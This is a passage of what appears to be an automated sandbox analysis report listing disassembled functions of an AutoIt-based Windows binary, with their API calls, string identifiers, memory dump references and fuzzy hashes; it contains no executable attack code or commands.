                                                                                      • SelectObject.GDI32(?,?), ref: 00CA7498
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CA74B7
                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CA74CE
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA74DB
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CA752A
                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CA7554
                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00CA7572
                                                                                      • DrawFocusRect.USER32(?,?), ref: 00CA757D
                                                                                      • GetSysColor.USER32(00000011), ref: 00CA758E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CA7596
                                                                                      • DrawTextW.USER32(?,00CA70F5,000000FF,?,00000000), ref: 00CA75A8
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA75BF
                                                                                      • DeleteObject.GDI32(?), ref: 00CA75CA
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA75D0
                                                                                      • DeleteObject.GDI32(?), ref: 00CA75D5
                                                                                      • SetTextColor.GDI32(?,?), ref: 00CA75DB
                                                                                      • SetBkColor.GDI32(?,?), ref: 00CA75E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                      • String ID:
                                                                                      • API String ID: 1996641542-0
                                                                                      • Opcode ID: f48c493b3e121a2ca9b89777acaa99adae78b7e921cf6acf6af63e0e48bd49fa
                                                                                      • Instruction ID: 473ee47aa2a1b511768ca825ac890939da090013599805de6514dcbf9cbe9347
                                                                                      • Opcode Fuzzy Hash: f48c493b3e121a2ca9b89777acaa99adae78b7e921cf6acf6af63e0e48bd49fa
                                                                                      • Instruction Fuzzy Hash: 85615172D04219AFDB019FA4DC49BDE7FB9FB0A324F114125FA15A72A1D7709940DF90
                                                                                      Function 00CA0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00CA1128
                                                                                      • GetDesktopWindow.USER32 ref: 00CA113D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00CA1144
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA1199
                                                                                      • DestroyWindow.USER32(?), ref: 00CA11B9
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CA11ED
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA120B
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA121D
                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00CA1232
                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00CA1245
                                                                                      • IsWindowVisible.USER32(00000000), ref: 00CA12A1
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00CA12BC
                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00CA12D0
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00CA12E8
                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00CA130E
                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00CA1328
                                                                                      • CopyRect.USER32(?,?), ref: 00CA133F
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00CA13AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                      • String ID: ($0$tooltips_class32
                                                                                      • API String ID: 698492251-4156429822
                                                                                      • Opcode ID: f151216f7176fec2266e9f7e5717ec91a6084737bf69819f1f8c394831d0f28a
                                                                                      • Instruction ID: 01c94dd985fbad93a4d2b98f6737169a776292fd5b43b44fa0cc6fdc284c0cc7
                                                                                      • Opcode Fuzzy Hash: f151216f7176fec2266e9f7e5717ec91a6084737bf69819f1f8c394831d0f28a
                                                                                      • Instruction Fuzzy Hash: A6B1AD71608342AFDB10DF64C884BAEBBE4FF86358F048918F9999B261C731EC45DB91
                                                                                      Function 00CA0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00CA02E5
                                                                                      • _wcslen.LIBCMT ref: 00CA031F
                                                                                      • _wcslen.LIBCMT ref: 00CA0389
                                                                                      • _wcslen.LIBCMT ref: 00CA03F1
                                                                                      • _wcslen.LIBCMT ref: 00CA0475
                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CA04C5
                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CA0504
                                                                                        • Part of subcall function 00C2F9F2: _wcslen.LIBCMT ref: 00C2F9FD
                                                                                        • Part of subcall function 00C7223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C72258
                                                                                        • Part of subcall function 00C7223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C7228A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                      • API String ID: 1103490817-719923060
                                                                                      • Opcode ID: e975b82b9b9445e00f0966817c11d6079142773816aac0ebd2f0b4eb39aab4e0
                                                                                      • Instruction ID: 50eb709ac88ae6304268bdb91c0490f6eb821d0a2c30ae79e94ecc0616ae472d
                                                                                      • Opcode Fuzzy Hash: e975b82b9b9445e00f0966817c11d6079142773816aac0ebd2f0b4eb39aab4e0
                                                                                      • Instruction Fuzzy Hash: AEE191312182028FCB14DF24C45196EB7E6BFCA358F644A6DF8969B3A1D730EE46DB41
                                                                                      Function 00C28891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C28968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00C28970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C2899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00C289A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00C289C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C289E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C289F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C28A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C28A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00C28A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C28A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C28A81
                                                                                        • Part of subcall function 00C2912D: GetCursorPos.USER32(?), ref: 00C29141
                                                                                        • Part of subcall function 00C2912D: ScreenToClient.USER32(00000000,?), ref: 00C2915E
                                                                                        • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000001), ref: 00C29183
                                                                                        • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000002), ref: 00C2919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00C290FC), ref: 00C28AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      • Opcode ID: 216dff8952466c0bf99246b1f4652223b7e78c792f8fa6da49d33e170daf643c
                                                                                      • Instruction ID: fdeb915b3375add4de256f22df95b1081f7364a6fa61dc1be5b67e374744cd1d
                                                                                      • Opcode Fuzzy Hash: 216dff8952466c0bf99246b1f4652223b7e78c792f8fa6da49d33e170daf643c
                                                                                      • Instruction Fuzzy Hash: 62B19B75A0021A9FDF24DFA8DD85BAE3BB5FB48314F154229FA15AB2D0DB34E940CB50
                                                                                      Function 00C70D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71114
                                                                                        • Part of subcall function 00C710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71120
                                                                                        • Part of subcall function 00C710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C7112F
                                                                                        • Part of subcall function 00C710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71136
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C7114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C70DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C70E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C70E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C70E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C70EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C70EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C70EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00C70EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C70F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C70F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C70F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C70FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70FA8
                                                                                        • Part of subcall function 00C71193: GetProcessHeap.KERNEL32(00000008,00C70BB1,?,00000000,?,00C70BB1,?), ref: 00C711A1
                                                                                        • Part of subcall function 00C71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C70BB1,?), ref: 00C711A8
                                                                                        • Part of subcall function 00C71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C70BB1,?), ref: 00C711B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: 7f5bb584b72fef82ec10573a069492f0917c533908a339dc98a5c02ca1ac5fcc
                                                                                      • Instruction ID: 2844660dddd7b29a36d6e20d3af79d3c051397fe4af869a22a18e3fa1760dd32
                                                                                      • Opcode Fuzzy Hash: 7f5bb584b72fef82ec10573a069492f0917c533908a339dc98a5c02ca1ac5fcc
                                                                                      • Instruction Fuzzy Hash: E2715B72A0020AEBDF20DFA4DC85FAEBBB8BF05304F148115F969E7191D7719A15CB60
                                                                                      Function 00C9C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CACC08,00000000,?,00000000,?,?), ref: 00C9C544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C9C5A4
                                                                                      • _wcslen.LIBCMT ref: 00C9C5F4
                                                                                      • _wcslen.LIBCMT ref: 00C9C66F
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C9C6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C9C7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C9C84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9C881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9C88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C9C960
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 9721498-966354055
                                                                                      • Opcode ID: 07cd5e02ace7219de7f82ac0031aad71ecf624e9016cf8474905847b633e3731
                                                                                      • Instruction ID: aef9daaf552421f2b8e7ee10ab3f11d36551ef1073dbe0d3a4f0dc8ee3c0c4df
                                                                                      • Opcode Fuzzy Hash: 07cd5e02ace7219de7f82ac0031aad71ecf624e9016cf8474905847b633e3731
                                                                                      • Instruction Fuzzy Hash: EC1278312042019FDB14DF14C895B6AB7E5EF89714F05899CF89A9B3A2DB31FD41EB81
                                                                                      Function 00CA091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00CA09C6
                                                                                      • _wcslen.LIBCMT ref: 00CA0A01
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA0A54
                                                                                      • _wcslen.LIBCMT ref: 00CA0A8A
                                                                                      • _wcslen.LIBCMT ref: 00CA0B06
                                                                                      • _wcslen.LIBCMT ref: 00CA0B81
                                                                                        • Part of subcall function 00C2F9F2: _wcslen.LIBCMT ref: 00C2F9FD
                                                                                        • Part of subcall function 00C72BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C72BFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                      • API String ID: 1103490817-4258414348
                                                                                      • Opcode ID: 02787938357308798475753ab6d8d9cc38043b05b44ca0f5edcfa98d1b81755f
                                                                                      • Instruction ID: 93c145f0e6eb6e7cc42f9fee53d24bd75a92f64f1bd70dd73ff55337d7f67e74
                                                                                      • Opcode Fuzzy Hash: 02787938357308798475753ab6d8d9cc38043b05b44ca0f5edcfa98d1b81755f
                                                                                      • Instruction Fuzzy Hash: C8E1B0312083028FC714DF25C45096AB7E2FF9A358F248A5DF8A69B362D731EE45DB81
                                                                                      Function 00C9C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                      • API String ID: 1256254125-909552448
                                                                                      • Opcode ID: f59425fb1c330587880c34c170adf3104843c9871ec1bef43117db06200bb7f9
                                                                                      • Instruction ID: efce02abb90c35067623be1112106340a05f58c833c9bb3c8481aa2313e101af
                                                                                      • Opcode Fuzzy Hash: f59425fb1c330587880c34c170adf3104843c9871ec1bef43117db06200bb7f9
                                                                                      • Instruction Fuzzy Hash: DA71053260016A8BCF20DE78CDD56BE3395AB61764F150629F87697284FA30CF81E3A0
                                                                                      Function 00CA833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00CA835A
                                                                                      • _wcslen.LIBCMT ref: 00CA836E
                                                                                      • _wcslen.LIBCMT ref: 00CA8391
                                                                                      • _wcslen.LIBCMT ref: 00CA83B4
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CA83F2
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CA5BF2), ref: 00CA844E
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8487
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CA84CA
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8501
                                                                                      • FreeLibrary.KERNEL32(?), ref: 00CA850D
                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CA851D
                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00CA5BF2), ref: 00CA852C
                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CA8549
                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CA8555
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                      • String ID: .dll$.exe$.icl
                                                                                      • API String ID: 799131459-1154884017
                                                                                      • Opcode ID: 591b6666dbd1993e9106271b20b004e3d433ad4220c5ab75c0912026f7e9f756
                                                                                      • Instruction ID: 320cb0206bb972ff8fbc0009d0e9566b97cb1d4d7336b6c1928f58978f05b749
                                                                                      • Opcode Fuzzy Hash: 591b6666dbd1993e9106271b20b004e3d433ad4220c5ab75c0912026f7e9f756
                                                                                      • Instruction Fuzzy Hash: 9B61027190020ABFEB14DF64CC85BBE77ACBF0A724F104609F825D61D0EB74AA84D7A0
                                                                                      Function 00C17778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                      • API String ID: 0-1645009161
                                                                                      • Opcode ID: c96eac2ef1706ef02e35d279013339fcc262d17400e2c6e62110601a6316122f
                                                                                      • Instruction ID: df10d9ed2b38cd7402120ea73c2faa75a8f3f6ca9b364e49252391cd844681c5
                                                                                      • Opcode Fuzzy Hash: c96eac2ef1706ef02e35d279013339fcc262d17400e2c6e62110601a6316122f
                                                                                      • Instruction Fuzzy Hash: 6F810575600605ABDB21AF61DC52FEF3BB8AF16304F044024FD05AA2D2EB70DA95E7E5
                                                                                      Function 00C75A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000063), ref: 00C75A2E
                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C75A40
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00C75A57
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C75A6C
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C75A72
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C75A82
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C75A88
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C75AA9
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C75AC3
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C75ACC
                                                                                      • _wcslen.LIBCMT ref: 00C75B33
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00C75B6F
                                                                                      • GetDesktopWindow.USER32 ref: 00C75B75
